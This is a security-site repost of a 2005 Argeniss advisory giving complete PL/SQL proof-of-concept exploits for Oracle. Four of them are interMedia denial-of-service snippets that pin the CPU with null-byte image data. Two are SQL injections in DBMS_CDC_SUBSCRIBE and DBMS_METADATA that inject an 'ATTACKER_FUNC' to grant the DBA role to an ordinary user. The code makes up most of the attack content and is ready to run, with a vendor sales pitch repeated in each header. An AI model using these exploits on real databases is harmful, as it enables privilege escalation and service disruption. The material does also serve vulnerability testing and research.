首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Multiple Exploit Codes for Oracle
来源:http://www.argeniss.com 作者:Cesar 发布时间:2005-04-22  

Multiple Exploit Codes for Oracle (interMedia, DBMS_CDC_SUBSCRIBE, DBMS_CDC_ISUBSCRIBE and DBMS_METADATA)

Summary
As we reported in our previous articles: Oracle interMedia DoS, Multiple SQL Injection Vulnerabilities in DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE Packages and Multiple SQL Injection Vulnerabilities in DBMS_METADATA Package, multiple vulnerabilities have been discovered in Oracle. The following exploit code can be used to test your Oracle installation for the mentioned vulnerabilities.

Credit:
The information has been provided by Cesar.
The original article can be found at: http://www.argeniss.com/research.html

Details
Exploit for Oracle interMedia DoS:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com

You think you are secure because you are running the unbreakable Oracle, you think you are secure because you are up to date with patches, you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five seconds bypassing all protection mechanisms. Think how much money you will loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes all unpatched Oracle vulnerability information with workaround scripts ready to apply.

Proof of concept exploit code for the Denial of Service vulnerability in Oracle InterMedia.
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

These exploits makes the Oracle process to consume 100% CPU usage.
*/

-- Exploit 1: Explicitly setting two null bytes to localData property
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init();
Image.source.localData := TO_BLOB(HEXTORAW('0000'));
Image.setProperties;
END;
/

-- Exploit 2: Loading from filesystem
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR', 'file_with_two_null_bytes.jpg');
Image.setProperties;
END;
/

-- Exploit 3: Loading from web
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init('HTTP', 'www.someserver.com/',
'file_with_two_null_bytes.jpg');
Image.setProperties;
END;
/


-- Exploit 4: Explicitly setting two null bytes to localData property of ORDDoc type.
DECLARE
Doc ORDSYS.ORDDoc;
R RAW(30000);
BEGIN
Doc := ORDSYS.ORDDoc.init();
Doc.source.localData := TO_BLOB(HEXTORAW('0000'));
Doc.setProperties (R, FALSE);
END;
/

Exploit for DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com


You think you are secure because you are running the unbreakable Oracle, you think you are secure because you are up to date with patches, you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five seconds bypassing all protection mechanisms. Think how much money you will loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes all unpatched Oracle vulnerability information with workaround scripts ready to apply.


Proof of concept exploit code for the SQL Injection vulnerability in Oracle
Database Server standard packages SYS.DBMS_CDC_SUBSCRIBE and
SYS.DBMS_CDC_ISUBSCRIBE (parameter SUBSCRIPTION_NAME).
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

This exploit grants the DBA role to the user SCOTT.
Required privileges: Database user with privileges to create or modify functions.
For more information on SQL injection issues in Oracle and how this exploit works
see the Advanced SQL Injection in Oracle databases presentation available at
http://www.argeniss.com/research.html
*/

-- First we create the function to be injected and executed as the SYS user.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/


-- Inject the function in the vulnerable procedure
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''');
END;
/

Exploit for DBMS_METADATA package:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com

You think you are secure because you are running the unbreakable Oracle, you think you are secure because you are up to date with patches, you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five seconds bypassing all protection mechanisms. Think how much money you will loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes all unpatched Oracle vulnerability information with workaround scripts ready to apply.


Proof of concept exploit code for the SQL Injection vulnerability in Oracle
Database Server standard package DBMS_METADATA.
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

This exploit grants the DBA role to the user SCOTT.
Required privileges: Database user with privileges to create or modify functions.
For more information on SQL injection issues in Oracle and how this exploit works
see the Advanced SQL Injection in Oracle databases presentation available at
http://www.argeniss.com/research.html
*/

-- First we create the function to be injected and executed as the SYS user.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/


-- Inject the function in the vulnerable procedure
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACKER_FUNC()||''','') FROM dual;
/



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PMsoftware Mini HTTP Server Re
·ICMP Attacks Against TCP Vulne
·Multiple Vendor TCP/IP Impleme
·BitchX Buffer Overflow
·WheresJames Webcam Publisher R
·phpBB Knowledge Base模块SQL注
·UBB Threads printthread.php Re
·ASPNuke comments.asp and detai
·Microsoft Exchange Server Remo
·MSN Messenger PNG Image Buffer
·PMSoftware Simple Web Server R
·FOXmail POC exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved